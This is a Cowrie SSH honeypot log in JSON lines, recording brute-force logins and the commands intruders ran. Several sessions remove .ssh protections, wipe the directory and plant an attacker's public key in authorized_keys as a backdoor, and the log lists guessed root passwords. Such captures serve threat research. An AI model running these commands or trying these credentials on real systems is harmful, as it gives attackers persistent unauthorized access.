{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:45:28.819529Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.login.success","username":"root","password":"xiaoaojianghu","message":"login attempt [root/xiaoaojianghu] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:45:29.654880Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:45:30.096044Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:45:30.096730Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:45:30.097963Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:30.296676Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:45:31.191261Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:45:31.191946Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:45:31.393840Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:31.394722Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":57166,"dst_ip":"1.2.3.4","dst_port":22,"session":"076ddfbc5e65","protocol":"ssh","message":"New connection: 118.26.39.178:57166 (1.2.3.4:22) [session: 076ddfbc5e65]","sensor":"my-vps","timestamp":"2025-09-09T06:45:31.705610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:45:31.706362Z","src_ip":"118.26.39.178","session":"076ddfbc5e65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:45:31.963178Z","src_ip":"118.26.39.178","session":"076ddfbc5e65"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:45:33.029109Z","src_ip":"118.26.39.178","session":"076ddfbc5e65"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:34.286412Z","src_ip":"118.26.39.178","session":"076ddfbc5e65"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":57178,"dst_ip":"1.2.3.4","dst_port":22,"session":"69c4cd029601","protocol":"ssh","message":"New connection: 118.26.39.178:57178 (1.2.3.4:22) [session: 69c4cd029601]","sensor":"my-vps","timestamp":"2025-09-09T06:45:34.541685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:45:34.545357Z","src_ip":"118.26.39.178","session":"69c4cd029601"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:45:34.798635Z","src_ip":"118.26.39.178","session":"69c4cd029601"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:45:35.823461Z","src_ip":"118.26.39.178","session":"69c4cd029601"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:36.020741Z","src_ip":"118.26.39.178","session":"c11e3639ec44"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:36.079757Z","src_ip":"118.26.39.178","session":"69c4cd029601"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56795,"dst_ip":"1.2.3.4","dst_port":22,"session":"0560ae16ba6f","protocol":"ssh","message":"New connection: 212.227.235.229:56795 (1.2.3.4:22) [session: 0560ae16ba6f]","sensor":"my-vps","timestamp":"2025-09-09T06:45:37.631431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:45:37.638876Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:45:37.753469Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123@","message":"login attempt [root/qwerty123@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:45:38.215937Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:45:38.470566Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:45:38.471264Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:45:38.472018Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:38.589451Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:45:38.922123Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:45:38.922852Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:45:39.042480Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:39.043371Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63301,"dst_ip":"1.2.3.4","dst_port":22,"session":"b453d3ddb09e","protocol":"ssh","message":"New connection: 212.227.235.229:63301 (1.2.3.4:22) [session: b453d3ddb09e]","sensor":"my-vps","timestamp":"2025-09-09T06:45:39.154252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:45:39.155129Z","src_ip":"212.227.235.229","session":"b453d3ddb09e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:45:39.270172Z","src_ip":"212.227.235.229","session":"b453d3ddb09e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:45:39.771032Z","src_ip":"212.227.235.229","session":"b453d3ddb09e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:40.891154Z","src_ip":"212.227.235.229","session":"b453d3ddb09e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53987,"dst_ip":"1.2.3.4","dst_port":22,"session":"28c60b920464","protocol":"ssh","message":"New connection: 212.227.235.229:53987 (1.2.3.4:22) [session: 28c60b920464]","sensor":"my-vps","timestamp":"2025-09-09T06:45:41.005943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:45:41.006779Z","src_ip":"212.227.235.229","session":"28c60b920464"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:45:41.123195Z","src_ip":"212.227.235.229","session":"28c60b920464"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:45:41.626334Z","src_ip":"212.227.235.229","session":"28c60b920464"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:41.745273Z","src_ip":"212.227.235.229","session":"0560ae16ba6f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:41.746170Z","src_ip":"212.227.235.229","session":"28c60b920464"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":41452,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb4df4a7eb40","protocol":"ssh","message":"New connection: 157.20.207.165:41452 (1.2.3.4:22) [session: eb4df4a7eb40]","sensor":"my-vps","timestamp":"2025-09-09T06:45:43.944561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:45:43.945175Z","src_ip":"157.20.207.165","session":"eb4df4a7eb40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43327,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d36a3df935d","protocol":"telnet","message":"New connection: 212.227.235.229:43327 (1.2.3.4:23) [session: 4d36a3df935d]","sensor":"my-vps","timestamp":"2025-09-09T06:45:44.071416Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:45:44.131845Z","src_ip":"157.20.207.165","session":"eb4df4a7eb40"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:45:44.908736Z","src_ip":"157.20.207.165","session":"eb4df4a7eb40"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:45:46.095324Z","src_ip":"157.20.207.165","session":"eb4df4a7eb40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53167,"dst_ip":"1.2.3.4","dst_port":22,"session":"d323548d9409","protocol":"ssh","message":"New connection: 212.227.235.229:53167 (1.2.3.4:22) [session: d323548d9409]","sensor":"my-vps","timestamp":"2025-09-09T06:45:58.129458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:45:58.130652Z","src_ip":"212.227.235.229","session":"d323548d9409"}
